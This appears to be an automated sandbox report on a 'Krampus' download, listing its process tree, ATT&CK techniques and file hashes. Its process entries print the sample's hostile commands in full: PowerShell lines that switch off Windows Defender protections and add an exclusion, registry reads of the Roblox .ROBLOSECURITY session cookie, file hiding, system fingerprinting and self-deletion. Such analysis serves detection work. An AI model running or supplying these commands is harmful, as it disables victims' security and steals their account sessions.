description pid Process procid_target PID 4852 wrote to memory of 4228 4852 msedge.exe 82 PID 4852 wrote to memory of 4228 4852 msedge.exe 82 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 2484 4852 msedge.exe 84 PID 4852 wrote to memory of 3484 4852 msedge.exe 85 PID 4852 wrote to memory of 3484 4852 msedge.exe 85 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 PID 4852 wrote to memory of 2580 4852 msedge.exe 86 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5144 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://krampus.pages.dev/Krampus.rar1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe16a46f8,0x7fffe16a4708,0x7fffe16a47182⤵PID:4228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:22⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2500 /prefetch:82⤵PID:2580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:12⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2908 /prefetch:12⤵PID:3980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:82⤵PID:620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:12⤵PID:784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵PID:3672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:12⤵PID:3708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:12⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5220 /prefetch:82⤵PID:3592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:12⤵PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:12⤵PID:5248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:12⤵PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:12⤵PID:5572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1752 /prefetch:12⤵PID:5828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:12⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1972 /prefetch:12⤵PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:12⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:12⤵PID:1772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5212 /prefetch:82⤵PID:5360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3004
-
-
C:\Users\Admin\Downloads\7z2409-x64.exe"C:\Users\Admin\Downloads\7z2409-x64.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,9481688692032112606,14371355800634545359,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5540 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:6052
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:892
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:940
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1952
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5776
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Krampus\" -spe -an -ai#7zMap11695:76:7zEvent228191⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5928
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Krampus\krampusexec-65cafadfc556c.txt1⤵PID:5880
-
C:\Users\Admin\Downloads\Krampus\b5uEJHZB6Rl.exe"C:\Users\Admin\Downloads\Krampus\b5uEJHZB6Rl.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\Downloads\Krampus\b5uEJHZB6Rl.exe"2⤵
- Views/modifies file attributes
PID:5144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Krampus\b5uEJHZB6Rl.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2240
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:5616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5384
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:5688
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Krampus\b5uEJHZB6Rl.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5836 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5964
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"1⤵
- Modifies system executable filetype association
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5180
Network
MITRE ATT&CK Enterprise v15
Persistence
Event Triggered Execution
2Change Default File Association
1Component Object Model Hijacking
1Privilege Escalation
Event Triggered Execution
2Change Default File Association
1Component Object Model Hijacking
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD588518dec90d627d9d455d8159cf660c5
SHA1e13c305d35385e5fb7f6d95bb457b944a1d5a2ca
SHA256f39996ab8eabdffe4f9a22abb1a97665816ec77b64440e0a20a80a41f0810ced
SHA5127c9d7bd455064d09307d42935c57de687764cf77d3c9ba417c448f4f2c4b87bcd6fea66354dfe80842a2fa3f96c81cc25e8bf77307b4ace1bbe1346cbe68435f
-
Filesize
1.8MB
MD5c4aabd70dc28c9516809b775a30fdd3f
SHA143804fa264bf00ece1ee23468c309bc1be7c66de
SHA256882063948d675ee41b5ae68db3e84879350ec81cf88d15b9babf2fa08e332863
SHA5125a88ec6714c4f78b061aed2f2f9c23e7b69596c1185fcb4b21b4c20c84b262667225cc3f380d6e31a47f54a16dc06e4d6ad82cfca7f499450287164c187cec51
-
Filesize
696KB
MD5d882650163a8f79c52e48aa9035bacbb
SHA19518c39c71af3cc77d7bbb1381160497778c3429
SHA25607a6236cd92901b459cd015b05f1eeaf9d36e7b11482fcfd2e81cd9ba4767bff
SHA5128f4604d086bf79dc8f4ad26db2a3af6f724cc683fae2210b1e9e2adf074aad5b11f583af3c30088e5c186e8890f8ddcf32477130d1435c6837457cf6ddaa7ca1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5b8880802fc2bb880a7a869faa01315b0
SHA151d1a3fa2c272f094515675d82150bfce08ee8d3
SHA256467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
SHA512e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2
-
Filesize
152B
MD5ba6ef346187b40694d493da98d5da979
SHA1643c15bec043f8673943885199bb06cd1652ee37
SHA256d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA5122e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD532d1191c24f27a17b0f0ea9268921e1a
SHA1de81a9c3ca50c7b533f502758963837f31faf527
SHA25608e401e68c5fa02005ecb13adfa46bc37315742ba778b78ae503a94d92504364
SHA5120d7128678a9dc139024adc8b09c03e83484e40e088d58bdcdafe92aac56231d880e82dfe10889f06166d9dbc3813e3a90c3e9cbc1877a3ffe9fead1ae18e6e85
-
Filesize
28KB
MD5942b177c5e7d83fca84dc0539e70ee3f
SHA1b2e9f4bf4009afdd6a8cb663af1cfa93bd379272
SHA256ad421aa69165cadb4ef31dd02389b473de1964d4a2b68c707440d8dc99e803db
SHA512acd436739e36bdb9c577ebe1dec0657b9de773b3d9b0f51dfeb538e6b8e716bb693d225c5e88698ce6e4275ad80c6a7b5fc9a9c3891ad8508ce88986e38b7a5e
-
Filesize
209B
MD579cb27845be50ea58849718a2bfe35bc
SHA127203ec46c370da7d99db366df7067bcf32fadfd
SHA25615ad7f609bd667eb3f5dc34288290f166079955d07c43d52004af463d8d12e6f
SHA5128719b0ee93e42621994364cdc8c01f8c15b167abec114e98f7082dda0ac087b1c2d7fe8a914c8d1eaafdca4177921f2f297b2b0a22d035e2841f76d8723c6e38
-
Filesize
698B
MD55fe81c4173184dd6fe8486727c89d80e
SHA163c3cbfa850d6538ed333ae256f011ea002e623f
SHA2564e8e48433e135526859805a8e8976e417b36af2c7b890eeb341c00a69be61903
SHA5121f29c963e72b063893bac4e4ddf89bd24b1013b9d98395a9e83c877e050f39015fef4a0317851ab7e6152a31f8418eee2aa46167b77a19880e36553d82afb7a3
-
Filesize
6KB
MD539787cddb6bf5d90e21c533506f90ef9
SHA1eaa8c38b22195e666f23307a99ec836d44c94db2
SHA256aeca1212701447997827bd0f4252b75c1bca22a68ff1d8af4efa2a1960afc8c9
SHA512701e07676ccab883520c9f41dbb7ffd0a33ec0ba9f0f083a59dcd5a70ae70ed5935c1d1b4246bf05b4a366f8cf55ad1a96b593c37ba9711c2df1afb0140755af
-
Filesize
6KB
MD56ca1d82ab214ffe3bb6dad3549c5d3ce
SHA1d7b3d2a180837f13242beff70d149f9011252a12
SHA256ebf91c2a4b6dd38ffc19f02b521447f5f2b716f0a67bb73051dc7557b1ca489c
SHA5127f53f53f61c8bb36b5cc79a8a5db02f8c8ac9147aed1d61d143f66a9a545bd6f75b11c0fe71e8482953e5f3d7f2bd9261a312cc4d9595eb10c628c6a14e95acb
-
Filesize
6KB
MD54ffeced35bc8f745026e54b008e13ee9
SHA17685a047a81f4c8ef7b398a64285d37f202bac1d
SHA256b878e0d64d1cee114ff5a3cc9696dd800380ab47ed12ef3e92ba94a4eb1debfe
SHA51259654af01a3fbc8f333be77941ab50331edc4ce9b4cfd57b7e0f06d6830f676621c6e6d5dff6742c05bd9393dcf5e3248e89cec93fd489805f9ebeabea896b02
-
Filesize
6KB
MD5fc76dac015afd35fe839b108579fdc0c
SHA1dc38267c14d6e4ef90d06912666807a95286aefd
SHA25666e17be51a2a6d339f7fe750368592441aeb071819eba2c9029bc902dd4a1602
SHA5127b09341fa9f4202c1722f690b2bf6d9920816b6cc73e815a77d0bb21a4696399b2f628f657269d1e49ea1ae3348ae01e68a2f5d8af2d36299524f6f3e151465f
-
Filesize
705B
MD5f6174f1ef815f91c97bf19f0bd4e08fe
SHA19ff8ff3ce068948b418e957448640b167b9c1d86
SHA25641b76d843049b620331774682e88573a88964374f8fcd0fdcfe43320833dd557
SHA512d38e3a5cbd3e8b6fc5bb3bd7c58135682ad5cb1f5832979a6718097eec89fbb676eda9f3ade4432973cb5a79fa32ef24c1c1e2aea3e89fe9c8ad5dea292938dd
-
Filesize
538B
MD50052f36572b8b10c0bf9cb46a05aefa1
SHA148005f40402aca8b8f2b9e4ec4cb432d1b2e71dd
SHA25652521f5fe26ed930a650b32681af217048810dc0bf0f95e0f17feb5712c465ab
SHA5124f34a3db1f06ae59b18fd67067b339efb8f49f152e5b9afd4521d0b44fca33d3c65f70e1c040890be25b6fdbc08e4c9139ef44ff1ad503b8f0a4d695a39c10d7
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
